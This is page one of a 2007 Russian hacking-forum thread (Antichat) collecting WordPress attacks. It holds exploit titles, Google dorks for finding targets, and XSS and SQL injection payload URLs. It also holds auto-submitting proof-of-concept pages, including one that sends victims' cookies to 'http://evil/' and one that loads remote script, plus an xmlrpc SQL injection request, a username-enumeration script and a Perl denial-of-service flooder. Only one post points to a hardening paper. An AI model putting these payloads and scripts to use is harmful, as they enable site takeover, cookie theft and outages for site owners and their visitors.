Форум АНТИЧАТ
Страница 1 из 16 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей WordPress ] (https://forum.antichat.xyz/showthread.php?t=50572)

ettee 05.10.2007 19:34
[ Обзор уязвимостей WordPress ]
 
Vulnerabilities:

Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)

Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability


1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

WordPress <= 1.5.1.1 SQL Injection Exploit

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

2.*
Wordpress <= 2.x dictionnary & Bruteforce attack

WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit


dork:
Код:
"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp ext:php
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype:php
intext:"powered by WordPress" filetype:php -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
ext:php inurl:"wp-login.php" -cvs

Full path disclosure:

WordPress < 1.5.2

Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

Tables/Prefix_/Columns:
wp_

Hash algorithms:
md5(password)

WordPress Vulnerability Scanner
Код:
$ perl -x wp-scanner.pl http://testblog/wordpress/

WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)

Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration[*] Finding WordPress Major Version[*] Testing WordPress Template for XSS

WordPress Basic Results

        wp-commentsrss2.php =>  Version Leak: WordPress 2.1.3
        wp-links-opml.php =>    Version Leak: WordPress 2.1.3
        wp-major-ver => Version 2.1
        wp-rdf.php =>  Version Leak: WordPress 2.1.3
        wp-rss.php =>  Version Leak: WordPress 2.1.3
        wp-rss2.php =>  Version Leak: WordPress 2.1.3
        wp-server =>    Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
        wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
        wp-title => Test Blog
        wp-version =>  WordPress 2.1.3
        x-Pingback =>  http://testblog/wordpress/xmlrpc.php

WordPress Plugins Found

        wp-plugins[0]    => Akismet
Download

+toxa+ 05.10.2007 19:39
WordPress Scanner v1.3b BETA
 
http://blogsecurity.net/cgi-bin/wp-scanner.cgi
http://blogsecurity.net/projects/wp-scanner.zip

+toxa+ 05.10.2007 19:48
WordPress <=2.0.4 XSS
 
simple PoC:
Код HTML:
<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
cookie theft PoC:

Код HTML:
<html>
<head></head>
<body>

<form method="post"
action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
>
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="anyusername" />
<input type="hidden" name="user_email" id="user_email"
value='"><script>eval(location.hash.substr(1))</script>' />

</form>
<script>document.forms[0].submit()</script>
</body>
</html>
unrestricted script insertion from third-party site

(we prove we can
inject ANY JS):

Код HTML:
<html>
<head></head>
<body>

<form method="post" action="http://victim/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="test" />
<input type="hidden" name="user_email" id="user_email"
value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

Solide Snake 05.10.2007 19:51
07 июня, 2007
Программа: WordPress 2.2, возможно более ранние версии

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в методе "wp.suggestCategories" в сценарии xmlrpc.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Для выполнения этого нужно что была разрешена регистрация на сайте, отправляется запрос только POST
Вот пример запроса
Код HTML:
<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>Здесь логин</value></param>
<param><value>Сдесь пароль</value></param>
<param><value>1</value></param>
<param><value>0 UNION SELECT USER()</value></param>
</params>
</methodCall>

+toxa+ 05.10.2007 19:54
Wordpress 2.2 Username Enumeration
 
PHP код:
#!/bin/bash

# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]
then
       echo "need to parameters! correct syntax is:"
       echo "$0 <ip-or-hostname> <wordlist-filename>"
       exit 1
fi


for U in `cat $2`
do
       #echo $U

       if curl --d
"log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" --url
"http://$1/wordpress/wp-login.php" grep -'Incorrect password' >
/dev/null
       then
               echo "username found!: $U# print username found on screen
               echo $U >> $0.found # save results to file equals to
script name plus .found extension
       fi
done 

+toxa+ 05.10.2007 20:20
WordPress Security Whitepaper
 
Цитата:
* Table of Contents
* Introduction
* Installing WordPress
o Accessing your WordPress tables
o Changing your WordPress Table Prefix
o Before Installation
o Manually Change
o Through WP Prefix Table Changer
* Preparing the Blog
o Changing your Admin Username
o Create a new limited access user
* Hardening your WP Install
o Restricting wp-content & wp-includes
o Restricting wp-admin
o Block all except your IP
o Password Required - .htpasswd
o The .htaccess file
o The .htpasswd file
* MUSTHAVE Plugins
o WPIDS - Detect Intrusions
o WordPress Plugin Tracker – Are you updated?
o WordPress Online Security Scanner
http://blogsecurity.net/projects/secure-wp-whitepaper.pdf

&&

Writing Secure WordPress Plugins
http://michaeldaw.org/papers/securing_wp_plugins/

ettee 05.10.2007 20:26
WordPress PHP_Self Cross-Site Scripting Vulnerability
Код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">       
<head>
        <title>Wordpress XSS PoC</title>
</head>
<body id="main">

        <form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
                <p>
                        <textarea name="newcontent" rows="8" cols="40">&lt;?php echo "Owned! " . date('F d, Y'); ?&gt;</textarea>
                </p>
                <p>
                        <input type="hidden" name="action" value="update" />
                        <input type="hidden" name="file" value="wp-content/themes/default/index.php" />               
                </p>
        </form>       
        <script type="text/javascript">
        // <![CDATA[
                document.forms[0].submit();
        // ]]>
        </script>
</body>
</html>
Vulnerable URI:
Код:
/wp-admin/plugins.php?page=akismet-key-config
Vulnerable Post variable:
Код:
_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
by 0x000000

Fugitif 05.10.2007 20:28
Wordpress Plugin Scanner
 
http://img294.imageshack.us/img294/4733/pspo8.jpg


http://www.blogeek.net/2007/09/26/wo...lugin-scanner/

Solide Snake 06.10.2007 08:53
Перебор паролей для версии Wordpress 2.x на Python тут.

ettee 06.10.2007 16:38
runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201′=0


WP <2.3
http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>


WordPress 2.0.1 Remote DoS Exploit
Код:
#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST  ".$dir."wp-register.php HTTP/1.1\r\n".
              "Accept: */*\r\n".
              "Accept-Language: en-gb\r\n".
              "Content-Type: application/x-www-form-urlencoded\r\n".
              "Accept-Encoding: gzip, deflate\r\n".
              "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
              "Host: $host\r\n".
              "Content-Length: $len\r\n".
              "Connection: Keep-Alive\r\n".
              "Cache-Control: no-cache\r\n\r\n".
 "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$foo", 0);
    syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /wordpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};


Время: 23:23
Страница 1 из 16 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице